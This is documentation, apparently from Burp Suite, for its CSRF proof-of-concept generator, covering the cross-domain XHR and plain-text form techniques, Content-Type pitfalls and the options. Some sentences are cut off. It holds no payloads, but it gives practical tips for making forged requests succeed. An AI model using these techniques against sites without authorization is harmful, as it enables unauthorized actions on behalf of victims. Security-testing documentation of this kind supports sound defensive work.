Generate CSRF PoC
This function can be used to generate a proof-of-concept (PoC) cross-site request forgery (CSRF) attack for
a given request.
To access this function, select a URL or HTTP request anywhere within Burp, and choose "Generate CSRF PoC"
within "Engagement tools" in the context menu.
When you execute this function, Burp shows the full request you selected in the top panel, and the generated
You can edit the request manually, and click the "Regenerate" button to regenerate the CSRF HTML based on
the updated request.
You can test the effectiveness of the generated PoC in your browser, using the "Test in browser" button.
When you select this option, Burp gives you a unique URL that you can paste into your browser (configured to
use the current instance of Burp as its proxy). The resulting browser request is served by Burp with the
currently displayed HTML, and you can then determine whether the PoC is effective by monitoring the
resulting request(s) that are made through the Proxy.
Some points should be noted regarding CSRF techniques:
The cross-domain XmlHttpRequest (XHR) technique only works on modern HTML5-capable browsers that support
cross-origin resource sharing (CORS). The technique has been tested on current versions of Firefox,
the application's response is not processed by the browser in the normal way, so it is not suitable for
making cross-domain requests to deliver reflected cross-site scripting (XSS) attacks. Cross-domain XHR
is subject to various restrictions which may prevent it from working with some request features. Burp
will display a warning in the CSRF PoC generator if this is liable to occur.
Some requests have bodies (e.g. XML or JSON) that can only be generated using either a form with plain
text encoding, or a cross-domain XHR. In the former case, the resulting request will include the header
"Content-Type: text/plain". In the latter case, the request can include any Content-Type header, but
will only qualify as a "simple" cross-domain request (and so avoid the need for a pre-flight request
which typically breaks the attack) if the Content-Type header has one of the standard values that may be
specified for normal HTML forms. In some cases, although the message body exactly matches that required
for the attack request, the application may reject the request due to an unexpected Content-Type header.
Such CSRF-like conditions might not be practically exploitable. Burp will display a warning in the CSRF
PoC generator if this is liable to occur.
If you manually select a CSRF technique that cannot be used to produce the
required request, Burp will generate a best effort at a PoC and will display a warning.
If the CSRF PoC generator is using plain text encoding, then the request body must contain an equals
character in order for Burp to generate an HTML form which results in that exact body. If the original
request does not contain an equals character, then you may be able to introduce one into a suitable
position in the request, without affecting the server's processing of it.
CSRF PoC options
The following options are available:
CRSF technique - This option lets you specify the type of CSRF technique to use in the
HTML that generates the CSRF request. The "Auto" option is generally preferred, and causes Burp to
select the most appropriate technique capable of generating the required request.
Include auto-submit script - Using this option causes Burp to include a script in the